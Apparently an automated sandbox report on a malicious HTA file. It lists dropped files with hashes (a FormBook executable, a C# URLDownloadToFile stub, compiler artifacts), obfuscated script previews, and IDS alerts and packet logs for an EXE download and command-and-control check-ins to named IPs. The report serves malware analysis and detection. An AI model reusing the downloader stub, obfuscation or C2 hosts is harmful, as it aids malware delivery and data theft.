                                                                                                            Preview:@%... ...%e%....%c%........ .%h%.%o% ...... .% %.....%o%...... ..%f%.... %f%....%..s%... .%e%... ..%t% ........% %.......%"% ..%o%....... .%R%.... ...%W%....%d%......%=%...%s%.. ... %e%........ %t%.... % %. . . .%"%.. .......%..%oRWd%"%..%E%......%V% ...... ..%O%...%s%.. %=% .... %=%..... .%"%...%..%oRWd%"%. . .....%H%....... ..%F% .......%u%...%B%. . ...%q%..%x%... .%m%... ... .%o%....%X%.. .%C%... .%%EVOs%C%....... .%l% .%o%........%a%...... .%"%.. . %..%oRWd%"%.... .....%C%...%l%. .... ..%K%.....%K%... ... %T%.....%x%... %k%.. ... %q%..... ....%R%.. ... %w%.%%EVOs%r%. ... ...%e%..... ..%m%...% %......%"% ...%..%oRWd%"%. %C%. . .%M%....%m%.

                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\hkcmd[1].exe

                                                                                                            Download File
                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1705472
                                                                                                            Entropy (8bit):7.30885465455862
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24576:P7c2dFfsDO896pbDZtUe0KId0nGw5FlPDtNX8KVevJyMYrOoyV:P0i9H/0r0Gw5nOJb/o
                                                                                                            MD5:05EF4CA659965C1D3FAA58077B0F9943
                                                                                                            SHA1:C168978862AA0A8D00C7F9B359DC5E8059AC7844
                                                                                                            SHA-256:00B229DE51C409D79B0084465543C9197F797D4A835290EBF72CBCE75CFB2044
                                                                                                            SHA-512:7052A7EAA776E78071ED9E33B5C3AA538B9E566C70810C0EDDD530971E7A85920192FB8F1CC02B27949F251A75EEB84B3285427B6F6C998B459B94DFE44AA5C1
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 72%
                                                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*............................,........ ....@..............................................@...............................'...`...,......................H...................................................d...$............................text............................... ..`.itext..t........................... ..`.data...`.... ... ..................@....bss.....6...@.......,...................idata...'.......(...,..............@....tls....4............T...................rdata...............T..............@..@.reloc..H............V..............@..B.rsrc....,...`...,..................@..@....................................@..@................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                            Download File
                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1328
                                                                                                            Entropy (8bit):5.403946642126862
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:3K2WSKco4KmM6GjKbm51s4RPQoUebIKo+mZ9t7J0gt/NK3R8UHr8Htq:bWSU4YymI4RIoUeW+mZ9tK8NWR8Wz
                                                                                                            MD5:276EE60DA8C7B40934E1B4AD4638FF1D
                                                                                                            SHA1:2BDEA3A1BE5CAA28240D1E82594B0CC54A7545BE
                                                                                                            SHA-256:EA80D168BD2583415B24E156EFF5E8A885E03186E1C3D150CE8F22E4CBE500A3
                                                                                                            SHA-512:4790759D0B741B5938A2D2E2D5FB4577A8377DEF6F905AA5B6DAD8ED547D868787F96F74B6577BC46254E55881224B9F6CF2009BD1B9C6302E953BA20A5F3834
                                                                                                            Malicious:false
                                                                                                            Preview:@...e.................................,..............@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                                                            C:\Users\user\AppData\Local\Temp\4jbortuo\4jbortuo.0.cs

                                                                                                            Download File
                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (358)
                                                                                                            Category:dropped
                                                                                                            Size (bytes):478
                                                                                                            Entropy (8bit):3.790589396183003
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6:V/DsYLDS81zu+//q/0aPM6nQXReKJ8SRHy4HJ4PaNj/3ZUKMzy:V/DTLDfu+/ShAXfHVO8eKQy
                                                                                                            MD5:7808292EB7BE41C7133CD5B95DAF29F1
                                                                                                            SHA1:1DD12E018F4F24A6B00FD6DC0528ABF7C1ED9F80
                                                                                                            SHA-256:CD934F26CC54874154DE3C661C6BEF3ECC975BC6252B1E3B5ED18CFB50390316
                                                                                                            SHA-512:71E740FAE8AFE22FCC9BC8D0295FB3396EEDD2B201D00D1013F214E601DB3685F25D7974C0F0F2F856E9A460BDD48DB3EDC19640551343E6DCF584E917DC2278
                                                                                                            Malicious:false
                                                                                                            Preview:.using System;.using System.Runtime.InteropServices;..namespace qdZRQbUd.{. public class oUOVqima. {. [DllImport("uRlmoN", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr etHU,string AEhSArcXevF,string hV,uint Moz,IntPtr jLmHlbmla);.. }..}.

                                                                                                            C:\Users\user\AppData\Local\Temp\4jbortuo\4jbortuo.cmdline

                                                                                                            Download File
                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (374), with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):377
                                                                                                            Entropy (8bit):5.206346357050498
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2cNwi23fSah+zxs7+AEszIcNwi23fSaL9:p37Lvkmb6KwZBh+WZEJZBZ
                                                                                                            MD5:44D56321CB51085CF8156DF24AD533D9
                                                                                                            SHA1:96BDFDA0F60C843DB48E3BECD3746ADA11D5E620
                                                                                                            SHA-256:F5134936427FB806AE5E7CC623F783FB6EB49D5CEDA8A52872DE27A114C0A421
                                                                                                            SHA-512:E31C7C67AE15758D1B1798757CB5BEB7A47607C054530238D3B88F59CEC6D27330C5B7BD9FEBFCD1A085CF3C22480E52B6671D7450C38929B0460543271753B6
                                                                                                            Malicious:true
                                                                                                            Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\4jbortuo\4jbortuo.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\4jbortuo\4jbortuo.0.cs"

                                                                                                            C:\Users\user\AppData\Local\Temp\4jbortuo\4jbortuo.dll

                                                                                                            Download File
                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):3072
                                                                                                            Entropy (8bit):2.8155668407284593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:etGSKPBe5ekrl8aBl/zkdbEKytkZfJdpRbCZ0WI+ycuZhNlakSTPNnq:6xskr+aB+bEUJJdpRbCZX1ulla3Zq
                                                                                                            MD5:9A587C01942127DBEF333F2C06E572BC
                                                                                                            SHA1:529BA9693838F2EEC7660295EC983D2B1B260886
                                                                                                            SHA-256:DFF2FD5EDC73DFAB06B69D31DF8A64270478EF29B4F6C5783D6E82894E9BFB0F
                                                                                                            SHA-512:5FBC57FD40938C101A7C38E82E37A405E3B576CDD5258F72EE43729E3B440A891F806B46EB7139EDB96560944073400E93FE47106935E89404C6F12DBD27FBF4
                                                                                                            Malicious:true
                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..g...........!.................#... ...@....... ....................................@.................................\#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................9.2.....z.....z........................... .............. @.....P ......R.........X.....].....i.....l.....p...R.....R...!.R.....R.......!.....*.......@.......................................)..........<Module>.4j

                                                                                                            C:\Users\user\AppData\Local\Temp\4jbortuo\4jbortuo.out

                                                                                                            Download File
                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (458), with CRLF, CR line terminators
                                                                                                            Category:modified
                                                                                                            Size (bytes):879
                                                                                                            Entropy (8bit):5.289028133389928
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:Kwqd3ka6KgzEvOKax5DqBVKVrdFAMBJTH:xika67zEvOK2DcVKdBJj
                                                                                                            MD5:8E48C859FB15D9BB587D437A7BC785FA
                                                                                                            SHA1:FF0FC7C8F2CB01D0BF0B3C3FA23ECC168F6CFC40
                                                                                                            SHA-256:F03CC5C37409F76ED50549E0618FCB622DBCFAA7A30A823FA7F1ABE7F06788FE
                                                                                                            SHA-512:402B9B4D1D9FE4764D3F1462BDCD90BC0BE63E8D2175D7F9EF435AB9898B34A54EA67215922B0C70727C3275F0C66A42D4CD1277B88C168BDB91F3CD7E0084FA
                                                                                                            Malicious:false
                                                                                                            Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\4jbortuo\4jbortuo.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\4jbortuo\4jbortuo.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                                                                            C:\Users\user\AppData\Local\Temp\4jbortuo\CSC8F941E4524844CFB0E06A557A70D099.TMP

                                                                                                            Download File
                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                            File Type:MSVC .res
                                                                                                            Category:dropped
                                                                                                            Size (bytes):652
                                                                                                            Entropy (8bit):3.087338099052743
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryvfak7YnqqMYPN5Dlq5J:+RI+ycuZhNlakSTPNnqX
                                                                                                            MD5:06942E728B399E0CD4567E94FE980F00
                                                                                                            SHA1:F8FF0AE89DF98E8F6A9356B3AF2AFDEC3881530C
                                                                                                            SHA-256:2C0FEE83A1825B004FB124B03D988AE7F4262C09748223A3EA0E76918AA44C12
                                                                                                            SHA-512:1C15F3E955ADEA1E1A9D9F43AD727AD6B751E73EA649FE4BD57F3165263813FB433FBEB0A4A6E50A2CBF2437DA9A24432CE18C182490E8DC2A85190E06129331
                                                                                                            Malicious:false
                                                                                                            Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...4.j.b.o.r.t.u.o...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...4.j.b.o.r.t.u.o...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                                                            C:\Users\user\AppData\Local\Temp\61b83Fh

                                                                                                            Download File
                                                                                                            Process:C:\Windows\SysWOW64\systeminfo.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                            Category:modified
                                                                                                            Size (bytes):196608
                                                                                                            Entropy (8bit):1.1215401507481708
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:384:72qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:qq+n0E9ELyKOMq+8HKkjuczRv89
                                                                                                            MD5:4B7413BC9D2D60F801777DE457B19F3D
                                                                                                            SHA1:708BBAC7E9CF6448CBA5AD64C0F7DCF4DFF3355F
                                                                                                            SHA-256:DB9A12C7F30F936B06EEED870E949CF9C2B67EEC18EEFAA62658CE1A8DA8FE19
                                                                                                            SHA-512:71F7472F7918F59BB17F82C6A4B784D6742E7E2683DE4C5D60186664A5E304A21EEF4F8C88E7FC852B207876EC9D3EE963F4805C329FD07F8A4B93A0E3C43021
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\RESDFBA.tmp

                                                                                                            Download File
                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                            File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x496, 9 symbols, created Mon Apr 14 22:41:45 2025, 1st section name ".debug$S"
                                                                                                            Category:modified
                                                                                                            Size (bytes):1340
                                                                                                            Entropy (8bit):3.9988029184389267
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:HhiK9olwlI+hZHmwKOLmfWI+ycuZhNlakSTPNnqSed:OlsZlKYm+1ulla3ZqS+
                                                                                                            MD5:32021BCDA6E8EC7B70F97CA746881746
                                                                                                            SHA1:DC3FD5168451B97E20519BECAF2C9605381D259B
                                                                                                            SHA-256:187E75ED0609D5019D2B6562C95BB5B5E57E96AE1A1432F40934C7E8112E686B
                                                                                                            SHA-512:84D2C5C3F00E1AF882B5C12EA9306AC95DBB4C7C34DF2AFC341E4D4EC83F2895FBC413103142B18D1CB10CD113B5952C6E918517BBEF077C3650F66F20177F6C
                                                                                                            Malicious:false
                                                                                                            Preview:L...)..g.............debug$S........X...................@..B.rsrc$01........X.......<...........@..@.rsrc$02........P...F...............@..@........W....c:\Users\user\AppData\Local\Temp\4jbortuo\CSC8F941E4524844CFB0E06A557A70D099.TMP...................r.9...V~...............7.......C:\Users\user~1\AppData\Local\Temp\RESDFBA.tmp.-.<....................a..Microsoft (R) CVTRES.`.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...4.j.b.o.r.t.u.o...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....

                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4o2agopd.2ti.psm1

                                                                                                            Download File
                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iai1ob15.1gb.psm1

                                                                                                            Download File
                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sxtvgikw.1nb.ps1

                                                                                                            Download File
                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vmnf24xw.2sk.ps1

                                                                                                            Download File
                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                            C:\Users\user\AppData\Roaming\hkcmd.exe

                                                                                                            Download File
                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1705472
                                                                                                            Entropy (8bit):7.30885465455862
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24576:P7c2dFfsDO896pbDZtUe0KId0nGw5FlPDtNX8KVevJyMYrOoyV:P0i9H/0r0Gw5nOJb/o
                                                                                                            MD5:05EF4CA659965C1D3FAA58077B0F9943
                                                                                                            SHA1:C168978862AA0A8D00C7F9B359DC5E8059AC7844
                                                                                                            SHA-256:00B229DE51C409D79B0084465543C9197F797D4A835290EBF72CBCE75CFB2044
                                                                                                            SHA-512:7052A7EAA776E78071ED9E33B5C3AA538B9E566C70810C0EDDD530971E7A85920192FB8F1CC02B27949F251A75EEB84B3285427B6F6C998B459B94DFE44AA5C1
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 72%
                                                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*............................,........ ....@..............................................@...............................'...`...,......................H...................................................d...$............................text............................... ..`.itext..t........................... ..`.data...`.... ... ..................@....bss.....6...@.......,...................idata...'.......(...,..............@....tls....4............T...................rdata...............T..............@..@.reloc..H............V..............@..B.rsrc....,...`...,..................@..@....................................@..@................................................................................................

                                                                                                            C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                            File Type:JSON data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):55
                                                                                                            Entropy (8bit):4.306461250274409
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                            MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                            SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                            SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                            SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                            Malicious:false
                                                                                                            Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                                            Static File Info

                                                                                                            General

                                                                                                            File type:HTML document, ASCII text, with very long lines (13289), with CRLF line terminators
                                                                                                            Entropy (8bit):2.314478512534823
                                                                                                            TrID:
                                                                                                            • HyperText Markup Language (15015/1) 100.00%
                                                                                                            File name:truelifewithmanmadethingsonherefor.hta
                                                                                                            File size:13'457 bytes
                                                                                                            MD5:4bacf388eda7f9e173282b1577c99b3d
                                                                                                            SHA1:77dd004cd59ba53b9c44716b823a1c39ee293f95
                                                                                                            SHA256:904129faa57fc614cefc17655f9cb0fba9392d271dfe9a1b9c18c28829c0e664
                                                                                                            SHA512:97f7853515dc448552589e30f14ea11d3046fc3bd09dbc32ad9ffdfe00ca35015fd985634fb650ab9cf12b30879057dae09c606ceea4aab5848270a36680fb1a
                                                                                                            SSDEEP:96:OfLhTcmfLh6c5Twaj5wJbxjuurfLhCfLh0cQfLhb+:Ol/Q4watIMerc
                                                                                                            TLSH:D55263C31C20EDAA0300A235A9DC46C2FB6C577E089997577A9D52DFC300B7E52F6286
                                                                                                            File Content Preview:<!DOCTYPE html>..<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >..<html>..<body>..<sCRIPt lAnguAGe="VBScriPT">..DIM...............................................................................................................................

                                                                                                            Network Behavior

                                                                                                            Suricata IDS Alerts

                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                            2025-04-14T23:18:14.738710+02002022050ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M11192.3.26.14380192.168.2.749681TCP
                                                                                                            2025-04-14T23:18:14.878455+02002022051ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M21192.3.26.14380192.168.2.749681TCP
                                                                                                            2025-04-14T23:18:58.539439+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.749692192.197.113.15680TCP
                                                                                                            2025-04-14T23:18:58.539439+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.749692192.197.113.15680TCP
                                                                                                            2025-04-14T23:19:22.531056+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.74969413.248.169.4880TCP
                                                                                                            2025-04-14T23:19:25.218173+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.74969513.248.169.4880TCP
                                                                                                            2025-04-14T23:19:27.882802+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.74969613.248.169.4880TCP
                                                                                                            2025-04-14T23:19:30.552431+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.74969713.248.169.4880TCP
                                                                                                            2025-04-14T23:19:30.552431+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.74969713.248.169.4880TCP
                                                                                                            2025-04-14T23:19:36.119830+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749698209.74.80.15080TCP
                                                                                                            2025-04-14T23:19:36.119830+02002856318ETPRO MALWARE FormBook CnC Checkin (POST) M41192.168.2.749698209.74.80.15080TCP
                                                                                                            2025-04-14T23:19:38.805310+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749699209.74.80.15080TCP
                                                                                                            2025-04-14T23:19:41.501309+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749700209.74.80.15080TCP
                                                                                                            2025-04-14T23:19:44.217178+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.749701209.74.80.15080TCP
                                                                                                            2025-04-14T23:19:44.217178+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.749701209.74.80.15080TCP
                                                                                                            2025-04-14T23:19:50.741048+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.74970238.181.35.14280TCP
                                                                                                            2025-04-14T23:19:53.579116+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.74970338.181.35.14280TCP
                                                                                                            2025-04-14T23:19:56.411037+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.74970438.181.35.14280TCP
                                                                                                            2025-04-14T23:19:59.258737+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.74970538.181.35.14280TCP
                                                                                                            2025-04-14T23:19:59.258737+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.74970538.181.35.14280TCP
                                                                                                            2025-04-14T23:20:13.037818+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749706104.21.85.15680TCP
                                                                                                            2025-04-14T23:20:16.665369+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749707104.21.85.15680TCP
                                                                                                            2025-04-14T23:20:19.339093+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749708104.21.85.15680TCP

                                                                                                            Network Port Distribution

                                                                                                            TCP Packets

                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                            Apr 14, 2025 23:18:14.314559937 CEST4968180192.168.2.7192.3.26.143
                                                                                                            Apr 14, 2025 23:18:14.453872919 CEST8049681192.3.26.143192.168.2.7
                                                                                                            Apr 14, 2025 23:18:14.454046965 CEST4968180192.168.2.7192.3.26.143
                                                                                                            Apr 14, 2025 23:18:14.454242945 CEST4968180192.168.2.7192.3.26.143
                                                                                                            Apr 14, 2025 23:18:14.599524021 CEST8049681192.3.26.143192.168.2.7
                                                                                                            Apr 14, 2025 23:18:14.599548101 CEST8049681192.3.26.143192.168.2.7
                                                                                                            Apr 14, 2025 23:18:14.599595070 CEST8049681192.3.26.143192.168.2.7
                                                                                                            Apr 14, 2025 23:18:14.599608898 CEST8049681192.3.26.143192.168.2.7
                                                                                                            Apr 14, 2025 23:18:14.599621058 CEST8049681192.3.26.143192.168.2.7
                                                                                                            Apr 14, 2025 23:18:14.599632025 CEST8049681192.3.26.143192.168.2.7
                                                                                                            Apr 14, 2025 23:18:14.599643946 CEST8049681192.3.26.143192.168.2.7
                                                                                                            Apr 14, 2025 23:18:14.599654913 CEST8049681192.3.26.143192.168.2.7
                                                                                                            Apr 14, 2025 23:18:14.599672079 CEST8049681192.3.26.143192.168.2.7
                                                                                                            Apr 14, 2025 23:18:14.599685907 CEST8049681192.3.26.143192.168.2.7
                                                                                                            Apr 14, 2025 23:18:14.599704981 CEST4968180192.168.2.7192.3.26.143
                                                                                                            Apr 14, 2025 23:18:14.599704981 CEST4968180192.168.2.7192.3.26.143
                                                                                                            Apr 14, 2025 23:18:14.599802017 CEST4968180192.168.2.7192.3.26.143
                                                                                                            Apr 14, 2025 23:18:14.738709927 CEST8049681192.3.26.143192.168.2.7
                                                                                                            Apr 14, 2025 23:18:14.738903046 CEST8049681192.3.26.143192.168.2.7
